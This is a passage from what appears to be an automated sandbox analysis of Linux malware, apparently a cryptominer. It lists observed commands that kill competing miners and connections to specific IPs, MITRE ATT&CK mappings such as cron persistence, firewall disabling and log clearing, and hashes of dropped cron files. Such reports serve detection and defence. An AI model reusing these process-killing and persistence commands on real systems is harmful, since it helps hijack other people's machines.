  PID:2504
- /bin/grep
  grep 192.236.161.6
  2⤵
  PID:2503
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2513
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2512
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2511
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2510
- /bin/grep
  grep 88.99.242.92
  2⤵
  PID:2509
- /usr/bin/pkill
  pkill -f pastebin
  2⤵
  - Reads runtime system information
  PID:2514
- /usr/bin/pkill
  pkill -f 185.193.127.115
  2⤵
  PID:2515
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2517
- /usr/bin/pgrep
  pgrep -f monerohash
  2⤵
  PID:2516
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2519
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  - Reads CPU attributes
  PID:2518
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2521
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  PID:2520
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2523
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  - Reads runtime system information
  PID:2522
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2525
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  PID:2524
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2527
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  PID:2526

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit
/var/spool/cron/crontabs/tmp.4uFFl1

Filesize
175B

MD5
ee5b25f56c670666a93fb624a07511f1

SHA1
739387faeb4c10c7d7e2a63654a0cd6f820d0483

SHA256
cf4bbd71ddebdfe86baa3298cd6d560c011dc68c472f467e8658526955d62f4c

SHA512
f624be24ab6c1bce2d2311335cc37cc90207f7e90b8d8be432ba47803f29500213482d5be99dba723bc2f2c42fa27b74642d651499424d521b41c0cfda3136b1

Download Submit
/var/spool/cron/crontabs/tmp.7eBEPe

Filesize
318B

MD5
78d71e2d561bdc85f87856bbd99fc795

SHA1
9bdc07e2262728c96ead8022d1708a423c277777

SHA256
d4628bfdc2760ca46aeeba8d549e3a7ecbaa33d9de70110d21d4bf6e8f0f755a

SHA512
f6fe824adf418b5da084b995cdd7fc190635d609927d54ec864f8f44d51c2fd56f4d7d7df7609d98e4049a8c0494bea94b5cb48a3c7946da7d8c024c74e7e184

Download Submit